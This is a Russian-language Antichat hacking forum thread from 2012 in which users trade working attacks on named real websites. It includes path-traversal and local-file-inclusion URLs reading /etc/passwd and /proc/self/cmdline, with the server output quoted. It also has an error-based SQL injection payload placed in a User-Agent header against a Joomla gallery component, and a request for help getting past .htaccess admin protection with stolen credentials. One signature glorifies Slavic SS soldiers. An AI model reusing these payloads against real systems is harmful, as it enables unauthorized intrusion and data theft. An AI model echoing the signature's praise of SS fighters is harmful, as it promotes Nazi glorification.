 |
|
14.03.2012, 15:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от qaz
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
/thread49775.html
вот тут поищи, там где то в теме был вроде скрипт
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
14.03.2012, 16:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от qaz
почитал, наол много итересного,
такс а вот теперь, вопрос, а есть ла какойто софт для поиска логов апача?
просто вручную както тупо.
вот дппустим etc/passwd нашол
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
а логи не получается
мне как тот весь список что тут /thread91807.html
в ручную переберать?
или может есть более умный способ для их поиска? подскажите
http://wonted.ru/programms/librute/
https://rdot.org/forum/showthread.php?t=1142
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
14.03.2012, 16:23
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от shell_c0de
http://wonted.ru/programms/librute/
ухты, спасиб, но прога немного фуфловатся, ечто что именно касается словаря,
ведь допустим путь может быть разный, не только
../../../../etc/passwd а и юольше ../../../../../../etc/passwd и меньше,
мне как надо срегеть пути рзный длины и все записывать, получается? или я чегото непонимаю?
|
|
|
|
14.03.2012, 16:31
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
Сообщение от kise
А там вроде идет такой инклуд - http://zamok-met.ru/catalog/somefile? Или я не в теме
?
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd%00
|
|
|
|
14.03.2012, 17:16
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
|
|
|
|
14.03.2012, 17:19
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от kise
Подскажите как использовать эту инъекцию...
GET http://www.lxphoto.ru/components/com_datsogallery/sub_votepic.php?func=vote&user_rating=5&id=1
User-Agent: Mozilla' and (select 1 from(select count(*),concat(version(),0x00,floor(rand(0)*2))x from jos_users group by x)a)or'
http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
http://en.wikipedia.org/wiki/List_of_HTTP_headers
Изучай
|
|
|
|
14.03.2012, 17:28
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от qaz
http://zamok-met.ru/catalog.php?id=../../../../etc/passwd
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64 HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
Сообщение от qaz
или может есть более умный способ для их поиска? подскажите
Руки и голова
|
|
|
|
14.03.2012, 18:52
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
На админку стоит дополнительная авторизация .htaccess. Как-нить можно попасть в админ панель?
П.С. Все логин, пасс админа есть
|
|
|
|
14.03.2012, 18:57
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Спасибо за ответ, не могли бы ли вы подсказать какой-нибудь удобный инструмент для эксплуатации уязвимости?
|
|
|
|
14.03.2012, 19:02
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Сообщение от kise
Да, я раньше пользовался этими способами. Но мне нужен инструмент где можно отправлять свои куки, хедеры и т.п. Например некоторые запросы нельзя отправить браузером.
charles/tamper data в них хоть оргазм имитируй)
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
